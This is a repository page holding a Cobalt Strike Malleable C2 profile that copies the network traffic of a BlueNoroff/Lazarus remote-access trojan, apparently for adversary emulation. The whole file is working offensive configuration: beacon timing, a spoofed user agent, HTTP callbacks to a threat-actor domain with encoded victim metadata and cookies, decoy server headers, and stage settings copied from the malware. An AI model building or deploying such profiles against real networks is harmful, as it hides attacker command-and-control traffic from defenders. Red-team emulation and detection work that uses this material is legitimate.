infosecn1nja
/
Malleable-C2-Profiles
mirror of https://github.com/infosecn1nja/Malleable-C2-Profiles.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Malleable-C2-Profiles/APT/bluenoroff_rat.profile

114 lines
2.2 KiB
Plaintext
Raw Permalink Blame History

#imeklmg.exe
#2nd stage RAT C2 IOCs related to BlueNoroff, Lazarus financial targeting malware
#mostly taken from https://securelist.com/files/2017/04/Lazarus_Under_The_Hood_PDF_final.pdf -- and mostly from 'Malware 6' section
#filled in legit info best I could..
#xx0hcd
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0";
set dns_idle "8.8.8.8";
set maxdns "235";
http-get {
set uri "/view.jsp";
client {
header "Host" "update.toythieves.com";
header "Accept" "*/*";
header "Cookie" "0449651003fe48-Nff0eb7";
parameter "action" "Execute";
metadata {
netbios;
parameter "u";
}
parameter "Filename" "psmon.dat";
parameter "Param" "82.144.131.5";
}
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Server" "nginx/1.4.6 (Ubuntu)";
header "Connection" "close";
output {
netbios;
print;
}
}
}
http-post {
set uri "/View.jsp";
set verb "GET";
client {
header "Host" "update.toythieves.com";
header "Accept" "*/*";
parameter "action" "Execute";
output {
netbios;
parameter "u";
}
parameter "Filename" "avgnt.dat";
parameter "Param" "120.88.46.206";
id {
base64url;
prepend "0449651003fe48-";
header "Cookie";
}
}
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Server" "nginx/1.4.6 (Ubuntu)";
header "Connection" "close";
output {
base64;
print;
}
}
}
http-stager {
server {
header "Cache-Control" "private, max-age=0";
header "Content-Type" "text/html; charset=utf-8";
header "Server" "nginx/1.4.6 (Ubuntu)";
header "Connection" "close";
}
}
#From 'Malware 6' in doc
stage {
set compile_time "14 Jun 2016 11:56:42";
set userwx "false";
set image_size_x86 "487424";
}
Reference in New Issue View Git Blame Copy Permalink